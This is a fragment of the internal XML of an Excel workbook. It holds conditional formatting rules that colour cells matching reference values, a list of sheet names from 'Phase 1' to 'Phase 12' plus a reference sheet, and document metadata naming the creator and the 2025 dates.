          <x14:cfRule type="containsText" priority="13" operator="containsText" id="{852BEBB4-1A4B-4A36-B23B-EA1310A8E768}">
            <xm:f>NOT(ISERROR(SEARCH($A$130,E93)))</xm:f>
            <xm:f>$A$130</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="14" operator="containsText" id="{6FFC570F-DC57-4E3D-89D3-A1CBAEAE8DE8}">
            <xm:f>NOT(ISERROR(SEARCH($A$129,E93)))</xm:f>
            <xm:f>$A$129</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="15" operator="containsText" id="{7CFA41C5-D31D-4689-BCEF-08AA7F6CE8FF}">
            <xm:f>NOT(ISERROR(SEARCH($A$128,E93)))</xm:f>
            <xm:f>$A$128</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="16" operator="containsText" id="{66CB184B-DE71-4F51-8301-84D60F57D370}">
            <xm:f>NOT(ISERROR(SEARCH($A$127,E93)))</xm:f>
            <xm:f>$A$127</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E93:E94</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="9" operator="containsText" id="{D769A522-6565-4597-A666-6AC39AA0292C}">
            <xm:f>NOT(ISERROR(SEARCH($A$130,E97)))</xm:f>
            <xm:f>$A$130</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="10" operator="containsText" id="{33AEF8B7-9A96-4B29-81A7-580DBAC2EAD0}">
            <xm:f>NOT(ISERROR(SEARCH($A$129,E97)))</xm:f>
            <xm:f>$A$129</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="11" operator="containsText" id="{858C232E-1434-4EFB-B9D9-B772768CAEBE}">
            <xm:f>NOT(ISERROR(SEARCH($A$128,E97)))</xm:f>
            <xm:f>$A$128</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="12" operator="containsText" id="{5364A4A3-60D0-4031-8043-F483BEFA4E20}">
            <xm:f>NOT(ISERROR(SEARCH($A$127,E97)))</xm:f>
            <xm:f>$A$127</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E97:E99</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="5" operator="containsText" id="{6B9E03B9-9F48-49BF-85BD-668E3C491F4F}">
            <xm:f>NOT(ISERROR(SEARCH($A$130,E102)))</xm:f>
            <xm:f>$A$130</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="6" operator="containsText" id="{C7728DBC-CFDA-4A56-8011-4A1C26C9107F}">
            <xm:f>NOT(ISERROR(SEARCH($A$129,E102)))</xm:f>
            <xm:f>$A$129</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="7" operator="containsText" id="{0BF89248-BE08-40B3-B724-21EC243B98E4}">
            <xm:f>NOT(ISERROR(SEARCH($A$128,E102)))</xm:f>
            <xm:f>$A$128</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="8" operator="containsText" id="{0F60F961-E7F7-4D8C-B61D-232B51CDC477}">
            <xm:f>NOT(ISERROR(SEARCH($A$127,E102)))</xm:f>
            <xm:f>$A$127</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E102:E110</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="1" operator="containsText" id="{69692658-EAEE-4559-815C-AB43806162DC}">
            <xm:f>NOT(ISERROR(SEARCH($A$130,E113)))</xm:f>
            <xm:f>$A$130</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="2" operator="containsText" id="{B7569D6F-C4ED-4B3A-B61C-072605FD3586}">
            <xm:f>NOT(ISERROR(SEARCH($A$129,E113)))</xm:f>
            <xm:f>$A$129</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="3" operator="containsText" id="{47BC0437-373F-45E4-911C-ACA9886EBA97}">
            <xm:f>NOT(ISERROR(SEARCH($A$128,E113)))</xm:f>
            <xm:f>$A$128</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="4" operator="containsText" id="{A5E35897-8894-43EA-A62C-CC086A56AF37}">
            <xm:f>NOT(ISERROR(SEARCH($A$127,E113)))</xm:f>
            <xm:f>$A$127</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E113:E124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Phase 1</vt:lpstr>
      <vt:lpstr>Phase2</vt:lpstr>
      <vt:lpstr>Phase 3</vt:lpstr>
      <vt:lpstr>phase 4</vt:lpstr>
      <vt:lpstr>Phase 5</vt:lpstr>
      <vt:lpstr>Phase 6</vt:lpstr>
      <vt:lpstr>Phase 7</vt:lpstr>
      <vt:lpstr>Phase 8</vt:lpstr>
      <vt:lpstr>Phase 9</vt:lpstr>
      <vt:lpstr>Phase 10</vt:lpstr>
      <vt:lpstr>Phase 11</vt:lpstr>
      <vt:lpstr>Phase 12</vt:lpstr>
      <vt:lpstr>reffernce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Abdullah Riaz</dc:creator>
  <cp:lastModifiedBy>Abdullah Riaz</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-15T11:37:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-16T07:54:45Z</dcterms:modified>
</cp:coreProperties>
</file>